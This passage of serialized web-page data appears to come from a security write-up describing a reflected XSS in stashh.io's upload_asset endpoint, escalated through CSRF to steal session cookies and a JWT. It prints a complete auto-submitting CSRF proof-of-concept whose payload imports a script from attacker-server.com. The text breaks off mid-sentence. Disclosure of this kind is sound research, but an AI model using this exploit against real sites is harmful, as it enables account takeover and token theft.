fetch",{"type":27,"tag":207,"props":40188,"children":40189},{"style":226},[40190],{"type":33,"value":1343},{"type":27,"tag":207,"props":40192,"children":40193},{"style":1325},[40194],{"type":33,"value":40195},"\"/sapo.png\"",{"type":27,"tag":207,"props":40197,"children":40198},{"style":226},[40199],{"type":33,"value":40200},")).",{"type":27,"tag":207,"props":40202,"children":40203},{"style":1335},[40204],{"type":33,"value":40205},"blob",{"type":27,"tag":207,"props":40207,"children":40208},{"style":226},[40209],{"type":33,"value":15018},{"type":27,"tag":207,"props":40211,"children":40212},{"class":209,"line":4154},[40213],{"type":27,"tag":207,"props":40214,"children":40215},{"emptyLinePlaceholder":19},[40216],{"type":33,"value":2062},{"type":27,"tag":207,"props":40218,"children":40219},{"class":209,"line":4203},[40220,40224,40228,40232,40236,40241,40246,40250,40254,40259,40264,40269,40274],{"type":27,"tag":207,"props":40221,"children":40222},{"style":220},[40223],{"type":33,"value":10353},{"type":27,"tag":207,"props":40225,"children":40226},{"style":220},[40227],{"type":33,"value":4259},{"type":27,"tag":207,"props":40229,"children":40230},{"style":226},[40231],{"type":33,"value":40169},{"type":27,"tag":207,"props":40233,"children":40234},{"style":214},[40235],{"type":33,"value":22397},{"type":27,"tag":207,"props":40237,"children":40238},{"style":1335},[40239],{"type":33,"value":40240}," File",{"type":27,"tag":207,"props":40242,"children":40243},{"style":226},[40244],{"type":33,"value":40245},"([",{"type":27,"tag":207,"props":40247,"children":40248},{"style":220},[40249],{"type":33,"value":40205},{"type":27,"tag":207,"props":40251,"children":40252},{"style":226},[40253],{"type":33,"value":30333},{"type":27,"tag":207,"props":40255,"children":40256},{"style":1325},[40257],{"type":33,"value":40258},"'sapo.png'",{"type":27,"tag":207,"props":40260,"children":40261},{"style":226},[40262],{"type":33,"value":40263},", {",{"type":27,"tag":207,"props":40265,"children":40266},{"style":220},[40267],{"type":33,"value":40268},"type:",{"type":27,"tag":207,"props":40270,"children":40271},{"style":1325},[40272],{"type":33,"value":40273}," 'image/png'",{"type":27,"tag":207,"props":40275,"children":40276},{"style":226},[40277],{"type":33,"value":40278},"})\n",{"type":27,"tag":207,"props":40280,"children":40281},{"class":209,"line":4249},[40282,40286,40291,40295,40299,40304],{"type":27,"tag":207,"props":40283,"children":40284},{"style":220},[40285],{"type":33,"value":40159},{"type":27,"tag":207,"props":40287,"children":40288},{"style":220},[40289],{"type":33,"value":40290}," dataTransfer",{"type":27,"tag":207,"props":40292,"children":40293},{"style":226},[40294],{"type":33,"value":40169},{"type":27,"tag":207,"props":40296,"children":40297},{"style":214},[40298],{"type":33,"value":22397},{"type":27,"tag":207,"props":40300,"children":40301},{"style":1335},[40302],{"type":33,"value":40303}," DataTransfer",{"type":27,"tag":207,"props":40305,"children":40306},{"style":226},[40307],{"type":33,"value":4301},{"type":27,"tag":207,"props":40309,"children":40310},{"class":209,"line":4290},[40311,40316,40320,40325,40329,40333,40337,40341],{"type":27,"tag":207,"props":40312,"children":40313},{"style":220},[40314],{"type":33,"value":40315}," dataTransfer",{"type":27,"tag":207,"props":40317,"children":40318},{"style":226},[40319],{"type":33,"value":1041},{"type":27,"tag":207,"props":40321,"children":40322},{"style":220},[40323],{"type":33,"value":40324},"items",{"type":27,"tag":207,"props":40326,"children":40327},{"style":226},[40328],{"type":33,"value":1041},{"type":27,"tag":207,"props":40330,"children":40331},{"style":1335},[40332],{"type":33,"value":16914},{"type":27,"tag":207,"props":40334,"children":40335},{"style":226},[40336],{"type":33,"value":1343},{"type":27,"tag":207,"props":40338,"children":40339},{"style":220},[40340],{"type":33,"value":7596},{"type":27,"tag":207,"props":40342,"children":40343},{"style":226},[40344],{"type":33,"value":1455},{"type":27,"tag":207,"props":40346,"children":40347},{"class":209,"line":4304},[40348],{"type":27,"tag":207,"props":40349,"children":40350},{"emptyLinePlaceholder":19},[40351],{"type":33,"value":2062},{"type":27,"tag":207,"props":40353,"children":40354},{"class":209,"line":5466},[40355,40360,40364,40369,40373,40378,40382,40386],{"type":27,"tag":207,"props":40356,"children":40357},{"style":220},[40358],{"type":33,"value":40359}," file123",{"type":27,"tag":207,"props":40361,"children":40362},{"style":226},[40363],{"type":33,"value":1041},{"type":27,"tag":207,"props":40365,"children":40366},{"style":220},[40367],{"type":33,"value":40368},"files",{"type":27,"tag":207,"props":40370,"children":40371},{"style":226},[40372],{"type":33,"value":40169},{"type":27,"tag":207,"props":40374,"children":40375},{"style":220},[40376],{"type":33,"value":40377},"dataTransfer",{"type":27,"tag":207,"props":40379,"children":40380},{"style":226},[40381],{"type":33,"value":1041},{"type":27,"tag":207,"props":40383,"children":40384},{"style":220},[40385],{"type":33,"value":40368},{"type":27,"tag":207,"props":40387,"children":40388},{"style":226},[40389],{"type":33,"value":241},{"type":27,"tag":207,"props":40391,"children":40392},{"class":209,"line":5530},[40393,40398],{"type":27,"tag":207,"props":40394,"children":40395},{"style":214},[40396],{"type":33,"value":40397}," }",{"type":27,"tag":207,"props":40399,"children":40400},{"style":238},[40401],{"type":33,"value":40402},")()\n",{"type":27,"tag":207,"props":40404,"children":40405},{"class":209,"line":7900},[40406],{"type":27,"tag":207,"props":40407,"children":40408},{"emptyLinePlaceholder":19},[40409],{"type":33,"value":2062},{"type":27,"tag":207,"props":40411,"children":40412},{"class":209,"line":7909},[40413,40417,40421],{"type":27,"tag":207,"props":40414,"children":40415},{"style":39633},[40416],{"type":33,"value":40102},{"type":27,"tag":207,"props":40418,"children":40419},{"style":214},[40420],{"type":33,"value":39673},{"type":27,"tag":207,"props":40422,"children":40423},{"style":39633},[40424],{"type":33,"value":13274},{"type":27,"tag":207,"props":40426,"children":40427},{"class":209,"line":7917},[40428,40432,40436],{"type":27,"tag":207,"props":40429,"children":40430},{"style":39633},[40431],{"type":33,"value":39687},{"type":27,"tag":207,"props":40433,"children":40434},{"style":214},[40435],{"type":33,"value":39640},{"type":27,"tag":207,"props":40437,"children":40438},{"style":39633},[40439],{"type":33,"value":13274},{"type":27,"tag":36,"props":40441,"children":40442},{},[40443],{"type":33,"value":40444},"When playing around with the application, we discovered that if an invalid address was submitted, the user's input would be reflected directly inside the response, another possible XSS vulnerability.",{"type":27,"tag":36,"props":40446,"children":40447},{},[40448],{"type":33,"value":40449},"However, since the request was a POST request, we initially thought this was only a self-XSS.",{"type":27,"tag":36,"props":40451,"children":40452},{},[40453],{"type":33,"value":40454},"In an effort to increase the impact of the above vulnerability, we discovered a way to leverage Cross-Site Request Forgery (CSRF) to manipulate the user's browser into sending a forced request that contained our XSS payload.",{"type":27,"tag":36,"props":40456,"children":40457},{},[40458],{"type":33,"value":40459},"From here, we were able to steal the session cookie from local storage.",{"type":27,"tag":101,"props":40461,"children":40463},{"className":201,"code":40462,"language":200,"meta":7,"style":7},"\u003Chtml>\n \u003Cbody>\n \u003Cscript>history.pushState('', '', '/')\u003C/script>\n \u003Cform id=\"form123\" action=\"https://stashh.io/upload_asset\" method=\"POST\" enctype=\"multipart/form-data\" value=\"asd\">\n \u003Cinput type=\"file\" name=\"data\" id=\"file123\">\n \u003Cinput type=\"hidden\" name=\"config\" value=\"{"address":"<img/src=x onerror=import(`https://attacker-server.com/leak.js`)>","to":"profile-assets","type":"icon"}\" />\n \u003Cinput type=\"submit\" value=\"Submit request\" />\n \u003C/form>\n \u003C/body>\n\n \u003Cscript>\n\n (async ()=>{\n const blob = await (await fetch(\"/sapo.png\")).blob()\n\n let f = new File([blob], 'sapo.png', {type: 'image/png'})\n const dataTransfer = new DataTransfer();\n dataTransfer.items.add(f);\n\n file123.files = dataTransfer.files;\n\n form123.submit()\n })()\n\n \u003C/script>\n\u003C/html>\n",[40464],{"type":27,"tag":84,"props":40465,"children":40466},{"__ignoreMap":7},[40467,40482,40497,40528,40603,40654,40842,40881,40896,40911,40918,40933,40940,40951,41002,41009,41064,41091,41126,41133,41168,41175,41196,41207,41214,41229],{"type":27,"tag":207,"props":40468,"children":40469},{"class":209,"line":210},[40470,40474,40478],{"type":27,"tag":207,"props":40471,"children":40472},{"style":39633},[40473],{"type":33,"value":9257},{"type":27,"tag":207,"props":40475,"children":40476},{"style":214},[40477],{"type":33,"value":39640},{"type":27,"tag":207,"props":40479,"children":40480},{"style":39633},[40481],{"type":33,"value":13274},{"type":27,"tag":207,"props":40483,"children":40484},{"class":209,"line":244},[40485,40489,40493],{"type":27,"tag":207,"props":40486,"children":40487},{"style":39633},[40488],{"type":33,"value":39652},{"type":27,"tag":207,"props":40490,"children":40491},{"style":214},[40492],{"type":33,"value":39657},{"type":27,"tag":207,"props":40494,"children":40495},{"style":39633},[40496],{"type":33,"value":13274},{"type":27,"tag":207,"props":40498,"children":40499},{"class":209,"line":270},[40500,40504,40508,40512,40516,40520,40524],{"type":27,"tag":207,"props":40501,"children":40502},{"style":39633},[40503],{"type":33,"value":39652},{"type":27,"tag":207,"props":40505,"children":40506},{"style":214},[40507],{"type":33,"value":39673},{"type":27,"tag":207,"props":40509,"children":40510},{"style":39633},[40511],{"type":33,"value":17739},{"type":27,"tag":207,"props":40513,"children":40514},{"style":238},[40515],{"type":33,"value":39682},{"type":27,"tag":207,"props":40517,"children":40518},{"style":39633},[40519],{"type":33,"value":39687},{"type":27,"tag":207,"props":40521,"children":40522},{"style":214},[40523],{"type":33,"value":39673},{"type":27,"tag":207,"props":40525,"children":40526},{"style":39633},[40527],{"type":33,"value":13274},{"type":27,"tag":207,"props":40529,"children":40530},{"class":209,"line":296},[40531,40535,40539,40543,40547,40551,40555,40559,40563,40567,40571,40575,40579,40583,40587,40591,40595,40599],{"type":27,"tag":207,"props":40532,"children":40533},{"style":39633},[40534],{"type":33,"value":39703},{"type":27,"tag":207,"props":40536,"children":40537},{"style":214},[40538],{"type":33,"value":39708},{"type":27,"tag":207,"props":40540,"children":40541},{"style":220},[40542],{"type":33,"value":39713},{"type":27,"tag":207,"props":40544,"children":40545},{"style":226},[40546],{"type":33,"value":10380},{"type":27,"tag":207,"props":40548,"children":40549},{"style":1325},[40550],{"type":33,"value":39722},{"type":27,"tag":207,"props":40552,"children":40553},{"style":220},[40554],{"type":33,"value":39727},{"type":27,"tag":207,"props":40556,"children":40557},{"style":226},[40558],{"type":33,"value":10380},{"type":27,"tag":207,"props":40560,"children":40561},{"style":1325},[40562],{"type":33,"value":39736},{"type":27,"tag":207,"props":40564,"children":40565},{"style":220},[40566],{"type":33,"value":24384},{"type":27,"tag":207,"props":40568,"children":40569},{"style":226},[40570],{"type":33,"value":10380},{"type":27,"tag":207,"props":40572,"children":40573},{"style":1325},[40574],{"type":33,"value":39749},{"type":27,"tag":207,"props":40576,"children":40577},{"style":220},[40578],{"type":33,"value":39754},{"type":27,"tag":207,"props":40580,"children":40581},{"style":226},[40582],{"type":33,"value":10380},{"type":27,"tag":207,"props":40584,"children":40585},{"style":1325},[40586],{"type":33,"value":39763},{"type":27,"tag":207,"props":40588,"children":40589},{"style":220},[40590],{"type":33,"value":39768},{"type":27,"tag":207,"props":40592,"children":40593},{"style":226},[40594],{"type":33,"value":10380},{"type":27,"tag":207,"props":40596,"children":40597},{"style":1325},[40598],{"type":33,"value":39777},{"type":27,"tag":207,"props":40600,"children":40601},{"style":39633},[40602],{"type":33,"value":13274},{"type":27,"tag":207,"props":40604,"children":40605},{"class":209,"line":445},[40606,40610,40614,40618,40622,40626,40630,40634,40638,40642,40646,40650],{"type":27,"tag":207,"props":40607,"children":40608},{"style":39633},[40609],{"type":33,"value":39789},{"type":27,"tag":207,"props":40611,"children":40612},{"style":214},[40613],{"type":33,"value":15648},{"type":27,"tag":207,"props":40615,"children":40616},{"style":220},[40617],{"type":33,"value":39798},{"type":27,"tag":207,"props":40619,"children":40620},{"style":226},[40621],{"type":33,"value":10380},{"type":27,"tag":207,"props":40623,"children":40624},{"style":1325},[40625],{"type":33,"value":39807},{"type":27,"tag":207,"props":40627,"children":40628},{"style":220},[40629],{"type":33,"value":39812},{"type":27,"tag":207,"props":40631,"children":40632},{"style":226},[40633],{"type":33,"value":10380},{"type":27,"tag":207,"props":40635,"children":40636},{"style":1325},[40637],{"type":33,"value":39821},{"type":27,"tag":207,"props":40639,"children":40640},{"style":220},[40641],{"type":33,"value":39713},{"type":27,"tag":207,"props":40643,"children":40644},{"style":226},[40645],{"type":33,"value":10380},{"type":27,"tag":207,"props":40647,"children":40648},{"style":1325},[40649],{"type":33,"value":39834},{"type":27,"tag":207,"props":40651,"children":40652},{"style":39633},[40653],{"type":33,"value":13274},{"type":27,"tag":207,"props":40655,"children":40656},{"class":209,"line":867},[40657,40661,40665,40669,40673,40677,40681,40685,40689,40693,40697,40701,40706,40710,40715,40719,40724,40728,40733,40738,40742,40746,40751,40756,40761,40766,40771,40776,40780,40785,40789,40793,40798,40802,40807,40812,40817,40821,40825,40829,40834,40838],{"type":27,"tag":207,"props":40658,"children":40659},{"style":39633},[40660],{"type":33,"value":39846},{"type":27,"tag":207,"props":40662,"children":40663},{"style":214},[40664],{"type":33,"value":15648},{"type":27,"tag":207,"props":40666,"children":40667},{"style":220},[40668],{"type":33,"value":39798},{"type":27,"tag":207,"props":40670,"children":40671},{"style":226},[40672],{"type":33,"value":10380},{"type":27,"tag":207,"props":40674,"children":40675},{"style":1325},[40676],{"type":33,"value":39863},{"type":27,"tag":207,"props":40678,"children":40679},{"style":220},[40680],{"type":33,"value":39812},{"type":27,"tag":207,"props":40682,"children":40683},{"style":226},[40684],{"type":33,"value":10380},{"type":27,"tag":207,"props":40686,"children":40687},{"style":1325},[40688],{"type":33,"value":39876},{"type":27,"tag":207,"props":40690,"children":40691},{"style":220},[40692],{"type":33,"value":39768},{"type":27,"tag":207,"props":40694,"children":40695},{"style":226},[40696],{"type":33,"value":10380},{"type":27,"tag":207,"props":40698,"children":40699},{"style":1325},[40700],{"type":33,"value":27331},{"type":27,"tag":207,"props":40702,"children":40703},{"style":214},[40704],{"type":33,"value":40705},"{"",{"type":27,"tag":207,"props":40707,"children":40708},{"style":1325},[40709],{"type":33,"value":39898},{"type":27,"tag":207,"props":40711,"children":40712},{"style":214},[40713],{"type":33,"value":40714},"":"<",{"type":27,"tag":207,"props":40716,"children":40717},{"style":1325},[40718],{"type":33,"value":126},{"type":27,"tag":207,"props":40720,"children":40721},{"style":214},[40722],{"type":33,"value":40723},"/",{"type":27,"tag":207,"props":40725,"children":40726},{"style":1325},[40727],{"type":33,"value":39927},{"type":27,"tag":207,"props":40729,"children":40730},{"style":214},[40731],{"type":33,"value":40732},"=",{"type":27,"tag":207,"props":40734,"children":40735},{"style":1325},[40736],{"type":33,"value":40737},"x onerror",{"type":27,"tag":207,"props":40739,"children":40740},{"style":214},[40741],{"type":33,"value":40732},{"type":27,"tag":207,"props":40743,"children":40744},{"style":1325},[40745],{"type":33,"value":26754},{"type":27,"tag":207,"props":40747,"children":40748},{"style":214},[40749],{"type":33,"value":40750},"(`",{"type":27,"tag":207,"props":40752,"children":40753},{"style":1325},[40754],{"type":33,"value":40755},"https",{"type":27,"tag":207,"props":40757,"children":40758},{"style":214},[40759],{"type":33,"value":40760},"://",{"type":27,"tag":207,"props":40762,"children":40763},{"style":1325},[40764],{"type":33,"value":40765},"attacker-server",{"type":27,"tag":207,"props":40767,"children":40768},{"style":214},[40769],{"type":33,"value":40770},".",{"type":27,"tag":207,"props":40772,"children":40773},{"style":1325},[40774],{"type":33,"value":40775},"com",{"type":27,"tag":207,"props":40777,"children":40778},{"style":214},[40779],{"type":33,"value":40723},{"type":27,"tag":207,"props":40781,"children":40782},{"style":1325},[40783],{"type":33,"value":40784},"leak",{"type":27,"tag":207,"props":40786,"children":40787},{"style":214},[40788],{"type":33,"value":40770},{"type":27,"tag":207,"props":40790,"children":40791},{"style":1325},[40792],{"type":33,"value":200},{"type":27,"tag":207,"props":40794,"children":40795},{"style":214},[40796],{"type":33,"value":40797},"`)>","",{"type":27,"tag":207,"props":40799,"children":40800},{"style":1325},[40801],{"type":33,"value":39985},{"type":27,"tag":207,"props":40803,"children":40804},{"style":214},[40805],{"type":33,"value":40806},"":"",{"type":27,"tag":207,"props":40808,"children":40809},{"style":1325},[40810],{"type":33,"value":40811},"profile-assets",{"type":27,"tag":207,"props":40813,"children":40814},{"style":214},[40815],{"type":33,"value":40816},"","",{"type":27,"tag":207,"props":40818,"children":40819},{"style":1325},[40820],{"type":33,"value":40014},{"type":27,"tag":207,"props":40822,"children":40823},{"style":214},[40824],{"type":33,"value":40806},{"type":27,"tag":207,"props":40826,"children":40827},{"style":1325},[40828],{"type":33,"value":40023},{"type":27,"tag":207,"props":40830,"children":40831},{"style":214},[40832],{"type":33,"value":40833},""}",{"type":27,"tag":207,"props":40835,"children":40836},{"style":1325},[40837],{"type":33,"value":27331},{"type":27,"tag":207,"props":40839,"children":40840},{"style":39633},[40841],{"type":33,"value":40037},{"type":27,"tag":207,"props":40843,"children":40844},{"class":209,"line":892},[40845,40849,40853,40857,40861,40865,40869,40873,40877],{"type":27,"tag":207,"props":40846,"children":40847},{"style":39633},[40848],{"type":33,"value":39846},{"type":27,"tag":207,"props":40850,"children":40851},{"style":214},[40852],{"type":33,"value":15648},{"type":27,"tag":207,"props":40854,"children":40855},{"style":220},[40856],{"type":33,"value":39798},{"type":27,"tag":207,"props":40858,"children":40859},{"style":226},[40860],{"type":33,"value":10380},{"type":27,"tag":207,"props":40862,"children":40863},{"style":1325},[40864],{"type":33,"value":40061},{"type":27,"tag":207,"props":40866,"children":40867},{"style":220},[40868],{"type":33,"value":39768},{"type":27,"tag":207,"props":40870,"children":40871},{"style":226},[40872],{"type":33,"value":10380},{"type":27,"tag":207,"props":40874,"children":40875},{"style":1325},[40876],{"type":33,"value":40074},{"type":27,"tag":207,"props":40878,"children":40879},{"style":39633},[40880],{"type":33,"value":40037},{"type":27,"tag":207,"props":40882,"children":40883},{"class":209,"line":1475},[40884,40888,40892],{"type":27,"tag":207,"props":40885,"children":40886},{"style":39633},[40887],{"type":33,"value":40086},{"type":27,"tag":207,"props":40889,"children":40890},{"style":214},[40891],{"type":33,"value":39708},{"type":27,"tag":207,"props":40893,"children":40894},{"style":39633},[40895],{"type":33,"value":13274},{"type":27,"tag":207,"props":40897,"children":40898},{"class":209,"line":2065},[40899,40903,40907],{"type":27,"tag":207,"props":40900,"children":40901},{"style":39633},[40902],{"type":33,"value":40102},{"type":27,"tag":207,"props":40904,"children":40905},{"style":214},[40906],{"type":33,"value":39657},{"type":27,"tag":207,"props":40908,"children":40909},{"style":39633},[40910],{"type":33,"value":13274},{"type":27,"tag":207,"props":40912,"children":40913},{"class":209,"line":2092},[40914],{"type":27,"tag":207,"props":40915,"children":40916},{"emptyLinePlaceholder":19},[40917],{"type":33,"value":2062},{"type":27,"tag":207,"props":40919,"children":40920},{"class":209,"line":2130},[40921,40925,40929],{"type":27,"tag":207,"props":40922,"children":40923},{"style":39633},[40924],{"type":33,"value":39652},{"type":27,"tag":207,"props":40926,"children":40927},{"style":214},[40928],{"type":33,"value":39673},{"type":27,"tag":207,"props":40930,"children":40931},{"style":39633},[40932],{"type":33,"value":13274},{"type":27,"tag":207,"props":40934,"children":40935},{"class":209,"line":2168},[40936],{"type":27,"tag":207,"props":40937,"children":40938},{"emptyLinePlaceholder":19},[40939],{"type":33,"value":2062},{"type":27,"tag":207,"props":40941,"children":40942},{"class":209,"line":4095},[40943,40947],{"type":27,"tag":207,"props":40944,"children":40945},{"style":238},[40946],{"type":33,"value":40147},{"type":27,"tag":207,"props":40948,"children":40949},{"style":214},[40950],{"type":33,"value":18158},{"type":27,"tag":207,"props":40952,"children":40953},{"class":209,"line":4103},[40954,40958,40962,40966,40970,40974,40978,40982,40986,40990,40994,40998],{"type":27,"tag":207,"props":40955,"children":40956},{"style":220},[40957],{"type":33,"value":40159},{"type":27,"tag":207,"props":40959,"children":40960},{"style":220},[40961],{"type":33,"value":40164},{"type":27,"tag":207,"props":40963,"children":40964},{"style":226},[40965],{"type":33,"value":40169},{"type":27,"tag":207,"props":40967,"children":40968},{"style":376},[40969],{"type":33,"value":4173},{"type":27,"tag":207,"props":40971,"children":40972},{"style":226},[40973],{"type":33,"value":686},{"type":27,"tag":207,"props":40975,"children":40976},{"style":376},[40977],{"type":33,"value":4173},{"type":27,"tag":207,"props":40979,"children":40980},{"style":1335},[40981],{"type":33,"value":40186},{"type":27,"tag":207,"props":40983,"children":40984},{"style":226},[40985],{"type":33,"value":1343},{"type":27,"tag":207,"props":40987,"children":40988},{"style":1325},[40989],{"type":33,"value":40195},{"type":27,"tag":207,"props":40991,"children":40992},{"style":226},[40993],{"type":33,"value":40200},{"type":27,"tag":207,"props":40995,"children":40996},{"style":1335},[40997],{"type":33,"value":40205},{"type":27,"tag":207,"props":40999,"children":41000},{"style":226},[41001],{"type":33,"value":15018},{"type":27,"tag":207,"props":41003,"children":41004},{"class":209,"line":4154},[41005],{"type":27,"tag":207,"props":41006,"children":41007},{"emptyLinePlaceholder":19},[41008],{"type":33,"value":2062},{"type":27,"tag":207,"props":41010,"children":41011},{"class":209,"line":4203},[41012,41016,41020,41024,41028,41032,41036,41040,41044,41048,41052,41056,41060],{"type":27,"tag":207,"props":41013,"children":41014},{"style":220},[41015],{"type":33,"value":10353},{"type":27,"tag":207,"props":41017,"children":41018},{"style":220},[41019],{"type":33,"value":4259},{"type":27,"tag":207,"props":41021,"children":41022},{"style":226},[41023],{"type":33,"value":40169},{"type":27,"tag":207,"props":41025,"children":41026},{"style":214},[41027],{"type":33,"value":22397},{"type":27,"tag":207,"props":41029,"children":41030},{"style":1335},[41031],{"type":33,"value":40240},{"type":27,"tag":207,"props":41033,"children":41034},{"style":226},[41035],{"type":33,"value":40245},{"type":27,"tag":207,"props":41037,"children":41038},{"style":220},[41039],{"type":33,"value":40205},{"type":27,"tag":207,"props":41041,"children":41042},{"style":226},[41043],{"type":33,"value":30333},{"type":27,"tag":207,"props":41045,"children":41046},{"style":1325},[41047],{"type":33,"value":40258},{"type":27,"tag":207,"props":41049,"children":41050},{"style":226},[41051],{"type":33,"value":40263},{"type":27,"tag":207,"props":41053,"children":41054},{"style":220},[41055],{"type":33,"value":40268},{"type":27,"tag":207,"props":41057,"children":41058},{"style":1325},[41059],{"type":33,"value":40273},{"type":27,"tag":207,"props":41061,"children":41062},{"style":226},[41063],{"type":33,"value":40278},{"type":27,"tag":207,"props":41065,"children":41066},{"class":209,"line":4249},[41067,41071,41075,41079,41083,41087],{"type":27,"tag":207,"props":41068,"children":41069},{"style":220},[41070],{"type":33,"value":40159},{"type":27,"tag":207,"props":41072,"children":41073},{"style":220},[41074],{"type":33,"value":40290},{"type":27,"tag":207,"props":41076,"children":41077},{"style":226},[41078],{"type":33,"value":40169},{"type":27,"tag":207,"props":41080,"children":41081},{"style":214},[41082],{"type":33,"value":22397},{"type":27,"tag":207,"props":41084,"children":41085},{"style":1335},[41086],{"type":33,"value":40303},{"type":27,"tag":207,"props":41088,"children":41089},{"style":226},[41090],{"type":33,"value":4301},{"type":27,"tag":207,"props":41092,"children":41093},{"class":209,"line":4290},[41094,41098,41102,41106,41110,41114,41118,41122],{"type":27,"tag":207,"props":41095,"children":41096},{"style":220},[41097],{"type":33,"value":40315},{"type":27,"tag":207,"props":41099,"children":41100},{"style":226},[41101],{"type":33,"value":1041},{"type":27,"tag":207,"props":41103,"children":41104},{"style":220},[41105],{"type":33,"value":40324},{"type":27,"tag":207,"props":41107,"children":41108},{"style":226},[41109],{"type":33,"value":1041},{"type":27,"tag":207,"props":41111,"children":41112},{"style":1335},[41113],{"type":33,"value":16914},{"type":27,"tag":207,"props":41115,"children":41116},{"style":226},[41117],{"type":33,"value":1343},{"type":27,"tag":207,"props":41119,"children":41120},{"style":220},[41121],{"type":33,"value":7596},{"type":27,"tag":207,"props":41123,"children":41124},{"style":226},[41125],{"type":33,"value":1455},{"type":27,"tag":207,"props":41127,"children":41128},{"class":209,"line":4304},[41129],{"type":27,"tag":207,"props":41130,"children":41131},{"emptyLinePlaceholder":19},[41132],{"type":33,"value":2062},{"type":27,"tag":207,"props":41134,"children":41135},{"class":209,"line":5466},[41136,41140,41144,41148,41152,41156,41160,41164],{"type":27,"tag":207,"props":41137,"children":41138},{"style":220},[41139],{"type":33,"value":40359},{"type":27,"tag":207,"props":41141,"children":41142},{"style":226},[41143],{"type":33,"value":1041},{"type":27,"tag":207,"props":41145,"children":41146},{"style":220},[41147],{"type":33,"value":40368},{"type":27,"tag":207,"props":41149,"children":41150},{"style":226},[41151],{"type":33,"value":40169},{"type":27,"tag":207,"props":41153,"children":41154},{"style":220},[41155],{"type":33,"value":40377},{"type":27,"tag":207,"props":41157,"children":41158},{"style":226},[41159],{"type":33,"value":1041},{"type":27,"tag":207,"props":41161,"children":41162},{"style":220},[41163],{"type":33,"value":40368},{"type":27,"tag":207,"props":41165,"children":41166},{"style":226},[41167],{"type":33,"value":241},{"type":27,"tag":207,"props":41169,"children":41170},{"class":209,"line":5530},[41171],{"type":27,"tag":207,"props":41172,"children":41173},{"emptyLinePlaceholder":19},[41174],{"type":33,"value":2062},{"type":27,"tag":207,"props":41176,"children":41177},{"class":209,"line":7900},[41178,41183,41187,41192],{"type":27,"tag":207,"props":41179,"children":41180},{"style":220},[41181],{"type":33,"value":41182}," form123",{"type":27,"tag":207,"props":41184,"children":41185},{"style":226},[41186],{"type":33,"value":1041},{"type":27,"tag":207,"props":41188,"children":41189},{"style":1335},[41190],{"type":33,"value":41191},"submit",{"type":27,"tag":207,"props":41193,"children":41194},{"style":226},[41195],{"type":33,"value":15018},{"type":27,"tag":207,"props":41197,"children":41198},{"class":209,"line":7909},[41199,41203],{"type":27,"tag":207,"props":41200,"children":41201},{"style":214},[41202],{"type":33,"value":40397},{"type":27,"tag":207,"props":41204,"children":41205},{"style":238},[41206],{"type":33,"value":40402},{"type":27,"tag":207,"props":41208,"children":41209},{"class":209,"line":7917},[41210],{"type":27,"tag":207,"props":41211,"children":41212},{"emptyLinePlaceholder":19},[41213],{"type":33,"value":2062},{"type":27,"tag":207,"props":41215,"children":41216},{"class":209,"line":7926},[41217,41221,41225],{"type":27,"tag":207,"props":41218,"children":41219},{"style":39633},[41220],{"type":33,"value":40102},{"type":27,"tag":207,"props":41222,"children":41223},{"style":214},[41224],{"type":33,"value":39673},{"type":27,"tag":207,"props":41226,"children":41227},{"style":39633},[41228],{"type":33,"value":13274},{"type":27,"tag":207,"props":41230,"children":41231},{"class":209,"line":7934},[41232,41236,41240],{"type":27,"tag":207,"props":41233,"children":41234},{"style":39633},[41235],{"type":33,"value":39687},{"type":27,"tag":207,"props":41237,"children":41238},{"style":214},[41239],{"type":33,"value":39640},{"type":27,"tag":207,"props":41241,"children":41242},{"style":39633},[41243],{"type":33,"value":13274},{"type":27,"tag":36,"props":41245,"children":41246},{},[41247],{"type":33,"value":41248},"This script automatically sends the following config in POST body, which triggers the XSS and imports a malicious javascript file from attacker's server:",{"type":27,"tag":101,"props":41250,"children":41254},{"className":41251,"code":41252,"language":41253,"meta":7,"style":7},"language-json shiki shiki-themes slack-dark","{\n \"address\": \"\u003Cimg/src=x onerror=import(`https://attacker-server.com/leak.js`)>\",\n \"to\": \"profile-assets\",\n \"type\": \"icon\"\n}\n","json",[41255],{"type":27,"tag":84,"props":41256,"children":41257},{"__ignoreMap":7},[41258,41265,41286,41307,41324],{"type":27,"tag":207,"props":41259,"children":41260},{"class":209,"line":210},[41261],{"type":27,"tag":207,"props":41262,"children":41263},{"style":238},[41264],{"type":33,"value":18158},{"type":27,"tag":207,"props":41266,"children":41267},{"class":209,"line":244},[41268,41273,41277,41282],{"type":27,"tag":207,"props":41269,"children":41270},{"style":220},[41271],{"type":33,"value":41272}," \"address\"",{"type":27,"tag":207,"props":41274,"children":41275},{"style":238},[41276],{"type":33,"value":22606},{"type":27,"tag":207,"props":41278,"children":41279},{"style":1325},[41280],{"type":33,"value":41281},"\"\u003Cimg/src=x onerror=import(`https://attacker-server.com/leak.js`)>\"",{"type":27,"tag":207,"props":41283,"children":41284},{"style":238},[41285],{"type":33,"value":1842},{"type":27,"tag":207,"props":41287,"children":41288},{"class":209,"line":270},[41289,41294,41298,41303],{"type":27,"tag":207,"props":41290,"children":41291},{"style":220},[41292],{"type":33,"value":41293}," \"to\"",{"type":27,"tag":207,"props":41295,"children":41296},{"style":238},[41297],{"type":33,"value":22606},{"type":27,"tag":207,"props":41299,"children":41300},{"style":1325},[41301],{"type":33,"value":41302},"\"profile-assets\"",{"type":27,"tag":207,"props":41304,"children":41305},{"style":238},[41306],{"type":33,"value":1842},{"type":27,"tag":207,"props":41308,"children":41309},{"class":209,"line":296},[41310,41315,41319],{"type":27,"tag":207,"props":41311,"children":41312},{"style":220},[41313],{"type":33,"value":41314}," \"type\"",{"type":27,"tag":207,"props":41316,"children":41317},{"style":238},[41318],{"type":33,"value":22606},{"type":27,"tag":207,"props":41320,"children":41321},{"style":1325},[41322],{"type":33,"value":41323},"\"icon\"\n",{"type":27,"tag":207,"props":41325,"children":41326},{"class":209,"line":445},[41327],{"type":27,"tag":207,"props":41328,"children":41329},{"style":238},[41330],{"type":33,"value":451},{"type":27,"tag":36,"props":41332,"children":41333},{},[41334],{"type":33,"value":41335},"Then, the imported script is able to exfiltrate the JWT authentication token from 